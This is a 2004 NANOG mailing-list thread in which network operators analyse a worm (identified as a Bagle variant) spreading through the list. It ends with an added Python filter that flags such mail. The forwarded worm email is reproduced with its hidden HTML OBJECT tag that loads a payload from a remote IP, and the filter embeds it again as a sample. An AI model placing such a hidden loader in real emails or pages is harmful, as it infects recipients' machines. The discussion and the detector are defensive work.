Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ... This one supposedly came from 203.18.63.43 (Australia Powerhouse Museum - phm.gov.au) and advertises a page on IP 165.134.187.102 (Saint Louis University - slu.edu). "Connection refused" when I tried to see what's there.

---------- Forwarded message ----------
Return-Path: <owner-nanog@merit.edu>
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) ...
Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST)
Delivered-To: nanog@merit.edu
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for <nanog@merit.edu>; Wed, 17 Mar 2004 23:04:46 -0500 (EST)
Date: Thu, 18 Mar 2004 15:04:22 +1000
To: nanog@merit.edu
Subject: Re: Hi
From: srh@merit.edu
Message-ID: <nxkitnadhcvpztronff@merit.edu>
...
<html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://165.134.187.102:81/132847.php"> </OBJECT></body></html>
In message <Pine.LNX.4.44.0403172118250.2114-100000@sokol.elan.net>, "william(a t)elan.net" writes:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
This one supposedly came from 203.18.63.43 (Australia Powerhouse Museum - phm.gov.au) and advertises a page on IP 165.134.187.102 (Saint Louis University - slu.edu). "Connection refused" when I tried to see what's there.
No -- I'm pretty sure it's a worm. Of the 20 copies I've received -- in just the last 3 hours -- only three have been via the NANOG list. On the bright side, Spamassassin 2.63's default settings seem to kill this one. In fact, it was only by accident that I even noticed them.

--Steve Bellovin, http://www.research.att.com/~smb
william(at)elan.net writes on 3/18/2004 11:03 AM:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
Have you, by any chance, heard of "bcc"? That isn't a bug, that's a feature.

-- srs (postmaster|suresh)@outblaze.com // gpg : EDEDEFB9 manager, outblaze.com security and antispam operations
On 18.03.2004 05:47 Suresh Ramasubramanian wrote:
william(at)elan.net writes on 3/18/2004 11:03 AM:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
Have you, by any chance, heard of "bcc"? That isn't a bug, that's a feature.
Have you, by any chance, heard that most list mailers may be configured to refuse mails where the list-address does appear as Bcc ... Arnold
Interesting, it does respond, albeit sporadically.. It contains the usual stuff... a trojan.. It looks like a variant of Psyme.. *sigh* -colin.

On 18/03/2004, at 4:33 PM, william(at)elan.net wrote:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
This one supposedly came from 203.18.63.43 (Australia Powerhouse Museum - phm.gov.au) and advertises a page on IP 165.134.187.102 (Saint Louis University - slu.edu). "Connection refused" when I tried to see what's there.
FYI - if you're on a Windows machine DON'T TRY TO FOLLOW THE URL in that post. Somebody sent me a copy of the content and it's VBScript that downloads an image, converts it into an executable and then probably uses some bug in microshit products to have it executed. I'm not that good with Windows scripting, so whoever of the security people here wants to see it further, if you can not get it yourself, let me know. It's possible this may be a zombie-making virus using nanog to replicate (somebody's sick joke) but possibly it's more general with other lists too. Spammers and virus writers joined together are getting nastier and nastier.

On Wed, 17 Mar 2004, william(at)elan.net wrote:
Me thinks somebody has found a trapdoor in nanog mailsetup and is in general out to get us ...
This one supposedly came from 203.18.63.43 (Australia Powerhouse Museum - phm.gov.au) and advertises a page on IP 165.134.187.102 (Saint Louis University - slu.edu). "Connection refused" when I tried to see what's there.
---------- Forwarded message ----------
Return-Path: <owner-nanog@merit.edu>
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26]) ...
Received: by segue.merit.edu (Postfix) id 3B2ED5DE4F; Wed, 17 Mar 2004 23:04:48 -0500 (EST)
Delivered-To: nanog@merit.edu
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for <nanog@merit.edu>; Wed, 17 Mar 2004 23:04:46 -0500 (EST)
Date: Thu, 18 Mar 2004 15:04:22 +1000
To: nanog@merit.edu
Subject: Re: Hi
From: srh@merit.edu
Message-ID: <nxkitnadhcvpztronff@merit.edu>
...
william(at)elan.net wrote:
FYI - if you're on a Windows machine DON'T TRY TO FOLLOW THE URL in that post.
Somebody sent me a copy of the content and it's VBScript that downloads an image, converts it into an executable and then probably uses some bug in microshit products to have it executed. I'm not that good with Windows scripting, so whoever of the security people here wants to see it further, if you can not get it yourself, let me know. It's possible this may be a zombie-making virus using nanog to replicate (somebody's sick joke) but possibly it's more general with other lists too. Spammers and virus writers joined together are getting nastier and nastier.
It's another variant of Bagle... My analysis of it is at: http://www.au.sorbs.net/virus.explain.txt - since then Symantec has released its more detailed explanation under the headings for Bagle.r and Bagle.s

/ Mat
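A defender-side check for the two warning signs raised in this thread: the hidden OBJECT tag in the forwarded message that loads content from a remote host, and Arnold's point that a list server can refuse mail where the list address is absent from To:/Cc: (i.e. reached via Bcc). This is an added example, not code from the thread or from any of its participants; it uses only the Python standard library. The sample messages are constructed from the headers quoted above, and the list address, the "normal" port set (80/443) and the second and third sample messages are assumptions.

```python
"""Flag two warning signs discussed in the thread, on a parsed mail message:
a hidden <OBJECT> whose DATA attribute pulls a remote URL, and a list
address that is missing from To:/Cc:, i.e. the list was reached via Bcc."""
from email import message_from_string
from email.utils import getaddresses
from html.parser import HTMLParser
from urllib.parse import urlparse

LIST_ADDRESS = "nanog@merit.edu"  # assumption: the list this filter protects

# Constructed sample: headers and body copied from the message quoted in the thread.
WORM_MESSAGE = """\
Return-Path: <owner-nanog@merit.edu>
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 0AE2E5DE32 for <nanog@merit.edu>; Wed, 17 Mar 2004 23:04:46 -0500 (EST)
Date: Thu, 18 Mar 2004 15:04:22 +1000
To: nanog@merit.edu
Subject: Re: Hi
From: srh@merit.edu
Message-ID: <nxkitnadhcvpztronff@merit.edu>
Content-Type: text/html

<html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://165.134.187.102:81/132847.php"> </OBJECT></body></html>
"""

# Constructed variant (assumption): same body, but the list address is not in
# To:/Cc:, which is what a copy delivered through Bcc looks like to the list server.
BCC_MESSAGE = WORM_MESSAGE.replace("To: nanog@merit.edu", "To: someone@example.org")

# Constructed benign post (assumption) for comparison: plain text, list in To:.
CLEAN_MESSAGE = """\
From: poster@example.org
To: nanog@merit.edu
Subject: route flap question
Content-Type: text/plain

Has anyone else seen this?
"""


class HiddenObjectFinder(HTMLParser):
    """Collect DATA URLs of <object> tags that are styled display:none."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":  # HTMLParser already lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        url = urlparse(a.get("data", ""))
        if "display:none" in style and url.scheme in ("http", "https") and url.netloc:
            self.hits.append(a["data"])


def check_message(raw, list_address=LIST_ADDRESS):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    msg = message_from_string(raw)
    findings = []

    # 1. Arnold's rule: the list address should be visible in To: or Cc:.
    headers = msg.get_all("To", []) + msg.get_all("Cc", [])
    visible = {addr.lower() for _, addr in getaddresses(headers)}
    if list_address.lower() not in visible:
        findings.append("list address reached via Bcc")

    # 2. A hidden OBJECT in any HTML part that loads content from another host.
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "latin-1"
        finder = HiddenObjectFinder()
        finder.feed(part.get_payload(decode=True).decode(charset, "replace"))
        for url in finder.hits:
            port = urlparse(url).port
            note = f" on non-standard port {port}" if port not in (None, 80, 443) else ""
            findings.append(f"hidden OBJECT loads {url}{note}")
    return findings


if __name__ == "__main__":
    for name, raw in (("worm", WORM_MESSAGE), ("bcc", BCC_MESSAGE), ("clean", CLEAN_MESSAGE)):
        print(name, check_message(raw) or "ok")
```

The Bcc check is the cheap one and is what Arnold describes as a list-manager configuration option; the OBJECT check is content inspection of the kind Spamassassin did by default here, and it deliberately triggers only on the combination of a hidden element and a remote URL so that ordinary inline HTML does not trip it.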
participants (6)
- Arnold Nipper
- Colin Neeson
- Matthew Sullivan
- Steven M. Bellovin
- Suresh Ramasubramanian
- william(at)elan.net